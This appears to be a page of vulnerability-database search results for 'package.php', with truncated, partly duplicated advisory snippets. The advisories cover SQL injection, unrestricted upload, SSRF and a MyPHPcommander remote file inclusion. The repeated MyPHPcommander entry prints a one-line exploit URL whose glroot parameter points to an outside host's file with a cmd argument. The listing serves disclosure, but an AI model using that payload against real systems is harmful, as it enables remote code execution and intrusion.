CVE-2025-9426

A weakness has been identified in itsourcecode Online Tour and Travel Management System 1.0. This affects an unknown part of the file /package.php. Executing manipulation of the argument subcatid can lead to sql injection. The attack may be performed from a remote location. The exploit has been...

CVE-2024-12949 code-projects Travel Management System package.php sql injection

A vulnerability was found in code-projects Travel Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /package.php. The manipulation of the argument subcatid leads to sql injection. The attack can be initiated remotely. The exploit has been...

CVE-2024-12949

CVE-2024-12949 affects the code-projects Travel Management System 1.0. The vulnerability is an SQL injection in the unknown code of /package.php caused by improper handling of the subcatid parameter. It is exploitable remotely and the exploit has been disclosed publicly. Impact is described with ...

CVE-2024-9815 Codezips Tourist Management System create-package.php unrestricted upload

A vulnerability has been found in Codezips Tourist Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/create-package.php. The manipulation of the argument packageimage leads to unrestricted upload. The attack can be...

CVE-2024-9815 Codezips Tourist Management System create-package.php unrestricted upload

A vulnerability has been found in Codezips Tourist Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/create-package.php. The manipulation of the argument packageimage leads to unrestricted upload. The attack can be...

Server side request forgery (ssrf)

An issue was discovered in Simple Machines Forum SMF before release 2.0.17. There is SSRF related to Subs-Package.php and Subs.php because user-supplied data is used directly in curl calls...

CVE-2019-11574

An issue was discovered in Simple Machines Forum SMF before release 2.0.17. There is SSRF related to Subs-Package.php and Subs.php because user-supplied data is used directly in curl calls...

MyPHPcommander 2.0 (package.php) Remote File Include Vulnerability

script : http://sourceforge.net/projects/myphpcommander file : package.php vuln : requireonce $glroot.'system/lib/xml2.php'; Contact : Cold z3ro , [email protected] Exploit: http://site.0/myphpcommanderpath/system/lib/package.php?glroot=http://www.4azhar.com/soft.txt?cmd...

MyPHPcommander 2.0 (package.php) Remote File Include Vulnerability

No description provided by source. script : http://sourceforge.net/projects/myphpcommander file : package.php vuln : requireonce $glroot.'system/lib/xml2.php'; Contact : Cold z3ro , [email protected] Exploit:...

MyPHPcommander 2.0 - package.php Remote File Inclusion

MyPHPcommander 2.0 - package.php Remote File Inclusion script : http://sourceforge.net/projects/myphpcommander file : package.php vuln : requireonce $glroot.'system/lib/xml2.php'; Contact : Cold z3ro , [email protected] Exploit:...

MyPHPcommander 2.0 (package.php) Remote File Include Vulnerability

Exploit for unknown platform in category web applications ================================================================== MyPHPcommander 2.0 package.php Remote File Include Vulnerability ================================================================== script :...

MyPHPcommander 2.0 - 'package.php' Remote File Inclusion

script : http://sourceforge.net/projects/myphpcommander file : package.php vuln : requireonce $glroot.'system/lib/xml2.php'; Contact : Cold z3ro , [email protected] Exploit: http://site.0/myphpcommanderpath/system/lib/package.php?glroot=http://www.4azhar.com/soft.txt?cmd...